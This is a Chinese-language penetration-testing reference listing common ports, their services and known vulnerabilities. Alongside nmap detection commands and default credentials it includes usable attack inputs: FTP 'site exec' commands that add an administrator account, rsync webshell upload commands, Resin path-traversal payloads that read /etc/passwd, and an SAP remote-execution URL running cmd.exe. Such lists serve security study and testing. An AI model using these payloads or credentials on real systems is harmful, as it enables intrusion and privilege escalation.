常见端口及漏洞

---

前言

      整理记录下常见端口及漏洞，以便查找。

---

• 20/21/69：FTP（文件传输协议）/TFTP（小型文件传输协议）
  20：数据端口；21：控制端口；69：小型文件传输协议
  可以尝试匿名登录漏洞 anonymous/为空或任意邮箱(anon@ymous.tw)
  后门漏洞检测：

	nmap --script=vuln -p 21 ip  

	FTP/TFTP用户名密码暴力破解
	FTP提权命令：

  # 增加系统用户
   Quote site exec net user 4567 4567 /add
  # 提升到管理员权限
   Quote site exec net localgroup administrators 4567 /add

• 22：SSH
  弱口令、OpenSSH漏洞、ssh隧道及内网代理转发

• 23：Telnet远程连接服务
  弱口令、嗅探抓取telnet明文账户密码。

• 25：SMTP邮件服务
  弱口令、未授权、邮件伪造
  通过SMTP用户枚举获取用户名：

   nmap -p 25 -- smtp-enum-users.nse <target>

• 53：DNS域名系统
  DNS域传送漏洞、劫持、缓存投毒
  DNS域传送漏洞检测方式：nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxxx.com -p 53 -Pn dns.xxxx.com
  nmap --script dns-zone-transfer表示加载nmap文件夹下的脚本文件dns-zone-transfer.nse，扩展名.nse可省略。
  –script-args dns-zone-transfer.domain=xxxx.com向脚本传递参数，设置列出记录的域是xxxx.com
  kali可通过dnsenum检测：dnsenum xxxx.com

• 80/81/443：IIS服务
  PUT写文件、短文件名泄露、Apache解析漏洞

• 80/8080：Apache/Tomcat/Nginx/Axis2
  弱口令、解析漏洞、示例目录

• 110：POP3
  弱口令

• 137/139：samba
  弱口令：爆破工具可选hydra；命令：hydra -l username -p PassFile IP smb
  未授权访问、远程代码执行：CVE-2015-0240

• 161：SNMP
  默认团体名/弱口令访问
  利用方式：通过nmap自带的审计脚本进行检测，可能导致敏感信息泄露。

	弱口令检测：nmap –sU –p161 –script=snmp-brute <target>
	获取系统信息：nmap –sU –p161 –script=snmp-sysdescr <target>
	获取用户信息：nmap -sU -p161 --script=snmp-win32-user <target>
	获取网络端口状态：nmap -sU -p161 --script=snmp-netstat <target>

• 389：ldap轻量级目录访问协议
  ldap未授权可通过LDAPSoft Ldap Browser软件直接连接
  弱口令和盲注

• 443：HTTPS/SSL
  OpenSSL心脏滴血
  扫描脚本：nmap -sV --script=ssl-heartbleed

• 445：SMB
  溢出漏洞

• 512/513/514：Linux rexec
  rlogin远程登录

• 873：rsync
  匿名未授权访问、弱口令
  利用方式：攻击者可以执行下载/上传等操作，也可以尝试上传webshell。

	下载：#rsync -avz a.b.c.d::path/file path/filiname  
	上传：#rsync -avz path/filename a.b.c.d::path/file

• 1024：jupyter
  jupyter未授权 ip:1024/tree?

• 1090/1099：RMI
  JAVA RMI 反序列化远程命令执行漏洞
  检测工具：attackRMI.jar

• 1352：Lotus domino邮件服务端口
  爆破：弱口令（admin password）控制台
  信息泄露
  跨站脚本攻击

• 1433：MsSQL
  弱口令和注入
  利用方式：差异备份getshell、SA账户提权等

• 1521：Oracle
  弱口令

• 2049：NFS
  未授权

• 2181：ZooKeeper
  未授权
  检测方式：攻击者可通过执行envi命令获得系统大量的敏感信息，包括系统名称、Java环境。
  echo envi | nc ip port

• 2375：Docker
  检测方式：通过docker daemon api 执行docker命令。
  #列出容器信息，效果与docker ps -a 一致。

	curl http://<target>:2375/containers/json
	docker -H tcp://<target>:2375 start <Container Id>

• 2601：zebra
  默认密码

• 3128：squid
  空口令

• 3311/3312：kangle
  弱口令

• 3306：MySQL
  弱口令、拒绝服务、注入、提权

• 3389：Windows远程桌面/rdp
  CVE-2019-0708和弱口令，Shift粘滞键后门

• 3690：SVN服务
  SVN泄漏、未授权访问漏洞

• 4100：SYSBase
  弱口令

• 4430：锐捷NBR路由器
  可以尝试锐捷NBR路由器命令执行

• 4440：rundeck
  弱口令：admin

• 4560：log4j SocketServer监听的端口
  可能存在 ​ ​log4j<=1.2.17反序列化漏洞（CVE-2019-17571）​

• 4750：BMC
  可能存在 BMC服务器自动化RSCD代理远程代码执行(CVE-2016-1542)

• 4848：glassfish
  控制台弱口令、认证绕过

• 5000：syBase/DB2
  弱口令和命令注入
  CVE-2015-1922

• 5422：postgreSQL
  弱口令、注入攻击

• 5432：postgresql
  缓冲区溢出、弱口令、注入攻击

• 5632：pyanywhere
  拒绝服务、代码执行
  PyAnywhere服务：一款远控工具，有点类似vnc的功能,可以利用pcanywhere来进行提权。

• 5900/5901/5902：VNC
  弱口令、认证口令绕过、拒绝服务攻击（CVE-2015-5239）、权限提升（CVE-2013-6886）

• 5984：CouchDB
  命令执行、垂直权限绕过
  后台访问：http://:5984/_utils

• 6082：varnish
  未授权

• 6379：redis
  未授权
  利用方式：绝对路径写webshell 、利用计划任务执行命令反弹shell、公私钥认证获取root权限、主从复制RCE等。
  检测脚本：nmap -p 6379 --script redis-info <target>

• 7001：weblogic
  弱口令：用户名密码均一致，system/weblogic(密码可能是weblogic123)/portaladmin/guest
  Congsole后台部署war包上传webshell
  java反序列化
  SSRF内网探测
  命令执行

• 7778：Kloxo
  Kloxo主机控制面板登录

• 8000：JDWP
  远程命令执行漏洞
  检测工具：https://github.com/IOActive/jdwp-shellifier

• 8009-ajp13：Tomcat ajp
  任意文件读取(CNVD-2020-10487)。

• 8069：zabbix
  Zabbix弱口令：admin/zabbix
  可导致的Getshell漏洞

• 8080：Jboss
  弱口令、未授权访问、反序列化、远程代码执行。
  检测工具：https://github.com/joaomatosf/jexboss

• 8080：GlassFish
  弱口令admin/admin，直接部署shell
  任意文件读取获取服务器敏感配置信息

• 8080：Resin
  目录遍历、远程文件读取
  任意文件读取POC：
  payload1 = “/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd”
  payload2 = “/resin-doc/examples/jndi-appconfig/test?inputFile=…/…/…/…/…/…/…/…/…/…/etc/passwd”
  payload3 = “/ …\\web-inf”

• 8080/8089：Jenkins
  弱口令、未授权、反序列化
  利用方式：访问如下url，可以执行脚本命令，反弹shell，写入webshell等。
  http://:8080/manage
  http://:8080/script

• 8161: ActiveMQ
  弱口令、文件上传、反序列化
  利用方式：默认密码admin/admin登陆控制台、写入webshell、上传ssh key等方式。

• 8443：http-alt
  心脏滴血漏洞
  检测方式：nmap -sV -p port --script ssl-heartbleed.nse <target>

• 9000：fastcgi端口
  可能存在远程命令执行漏洞

• 9043/9080/9090：WebSphere
  弱口令，java反序列化、文件泄露
  后台地址：https://ip:port/ibm/console/logon.jsp

• 9200/9300：Elastic Search
  未授权、远程代码执行
  查看数据库名的操作为访问IP地http://xx.xx.xx.xx:9200/_plugin/head/
  GET方式_cat/indices?v
  检测方式：
  直接访问如下url，获取相关敏感信息。
  http://:9200/_nodes
  查看节点数据
  http://:9200/_river 查看数据库敏感信息

• 10000：Webmin-Web控制面板
  可能存在弱口令

• 10001/10002：JmxRemoteLifecycleListener监听的
  可能存在Tomcat反序列化漏洞(CVE-2016-8735)​

• 11211：memcache
  未授权
  检测方式：无需用户名密码，可以直接连接memcache 服务的11211端口。
  nc -vv 11211
  或nmap -p 11211 --script memcached-info <target>

• 27017/27018：mongodb
  未授权访问
  检测方式：nmap -p 27017 --script mongodb-info <target>

• 50000：SAP
  远程代码执行
  利用方式：攻击者通过构造url请求，实现远程代码执行。
  POC:http://:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all

• 50070：hadoop数据库
  未授权，信息泄露，命令执行

• 61616：Apache ActiveMQ服务端口
  可能存在 ​​Apache ActiveMQ任意文件写入漏洞（CVE-2016-3088）

• 40000-65535可尝试向日葵RCE